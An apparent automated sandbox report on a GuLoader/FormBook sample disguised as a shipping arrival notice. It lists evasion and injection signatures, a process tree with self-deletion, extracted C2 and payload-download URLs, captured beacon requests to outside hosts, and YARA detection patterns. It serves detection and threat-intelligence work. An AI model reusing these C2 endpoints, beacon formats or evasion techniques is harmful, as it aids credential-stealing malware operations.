
Windows Analysis Report NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe

Overview

General Information

Sample Name: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Analysis ID: 482590
MD5: e8bceea59b2074bd08bf68ab55ecdf3e
SHA1: 8b62bf811b03fe25924ef6ff4d4afd89c902f7cd
SHA256: 0b4684d82509a6e7e0c1cb63174bf68d182ccff75a3d19f16821127605d636b8
Tags: exe

Detection

GuLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: E8BCEEA59B2074BD08BF68AB55ECDF3E)
    • NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (PID: 6396 cmdline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: E8BCEEA59B2074BD08BF68AB55ECDF3E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.acooll.com/kbl2/"], "decoy": ["beckyhartpcpublishers.com", "durangosouladventures.com", "taylormakeyourlife.com", "vs88333.com", "electromoto.net", "kratusconsultoria.com", "ecolightingsolution.com", "changethenarrowtive.com", "interpunctto.com", "thelogicsticks.com", "priorpublic.com", "altamirasound.com", "zx136.com", "everythingswallow.com", "rlmwebcreations.com", "zogaripet.com", "stewco360.com", "cassiwalsh.com", "syst.taipei", "thefairwaywithin.com", "barrows66.online", "tablebarn.net", "gabrielladasilva.com", "anqiu.tech", "store504.com", "findmytribe.online", "hrlaboris.com", "packetin.com", "managinginit.com", "sfseminars.com", "evieguest.com", "toptanbezmaske.com", "veryzocn.com", "frendapp.net", "maraging-trade.com", "allinonemigration.com", "waifufood.com", "advancepestcontrol.website", "onetimerecovery.com", "theranchsmokehouse.com", "executivehomefinance.com", "gotothisnotary.com", "tousentrepreneur.com", "flow-dynamics.online", "open-numeric-center.com", "itonlylookshard.com", "losangelescustomupholstery.com", "wichitavillagefleamarket.com", "tigerlottotips.com", "videoquests.com", "osdentalcol.com", "easypercetakan.com", "havensretreatspa.com", "7-fwd.com", "bumbles.online", "microsoftjob.com", "wxsjykj.com", "numberoneratedinfiveg.com", "taylorservewest.com", "normalblue.com", "yes2synergy.com", "dominionhavanese.com", "tranmanh.net", "tanja-wenzel.com"]}

Threatname: GuLoader

{"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x1a508:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(21 entries in total; the remaining rows are not included in this extract)

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard | Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5228
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5228

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (same C2 list and decoy list as given under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Virustotal: Detection: 25%
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | ReversingLabs: Detection: 18%
Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: 14.2.rundll32.exe.a04480.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 14.2.rundll32.exe.4d6f834.4.unpack | Avira: Label: TR/Dropper.Gen
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
Source: Binary string: rundll32.pdb | source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: rundll32.pdbGCTL | source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 209.99.40.222 80
Source: C:\Windows\explorer.exe | Network Connect: 142.111.236.6 80
Source: C:\Windows\explorer.exe | Domain query: www.microsoftjob.com
Source: C:\Windows\explorer.exe | Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe | Domain query: www.wxsjykj.com
Source: C:\Windows\explorer.exe | Domain query: www.everythingswallow.com
Source: C:\Windows\explorer.exe | Domain query: www.acooll.com
Source: C:\Windows\explorer.exe | Network Connect: 44.227.76.166 80
Source: C:\Windows\explorer.exe | Domain query: www.priorpublic.com
Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.117 80
Source: C:\Windows\explorer.exe | Network Connect: 54.65.172.3 80
Source: C:\Windows\explorer.exe | Domain query: www.taylormakeyourlife.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.beckyhartpcpublishers.com
Source: C:\Windows\explorer.exe | Domain query: www.rlmwebcreations.com
Source: C:\Windows\explorer.exe | Domain query: www.dominionhavanese.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.acooll.com/kbl2/
Source: Malware configuration extractor | URLs: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
Source: Joe Sandbox View | ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 | Host: www.everythingswallow.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 | Host: www.priorpublic.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 | Host: www.taylormakeyourlife.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 | Host: www.rlmwebcreations.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 | Host: www.beckyhartpcpublishers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 | Host: www.microsoftjob.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 | Host: www.wxsjykj.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 | Host: www.acooll.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 91.195.240.117 91.195.240.117
Source: global traffic | HTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: www.paulassinkarchitect.nl | Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 13 Sep 2021 21:01:26 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000003.1187824235.00000000009C6000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/10_Best_Mutual_Funds.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrO
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/Anti_Wrinkle_Creams.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/Best_Penny_Stocks.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/Cheap_Air_Tickets.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/Parental_Control.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/Top_Smart_Phones.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/display.cfm
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/kbl2/?X8sl8h70=ocgDBp8RB
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: http://www.rlmwebcreations.com/song_lyrics.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3ErTA9i3
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258590873.000000000098E000.00000004.00000020.sdmp | String found in binary or memory: https://www.paulassinkarchitect.nl/
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp | String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp | String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin7
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp | String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin?
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp | String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binW
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp | String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binqs
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp | String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: https://www.value-domain.com/
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | String found in binary or memory: https://www.value-domain.com/modall.php
Source: unknown | DNS traffic detected: queries for: www.paulassinkarchitect.nl
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929269162.00000000007BA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
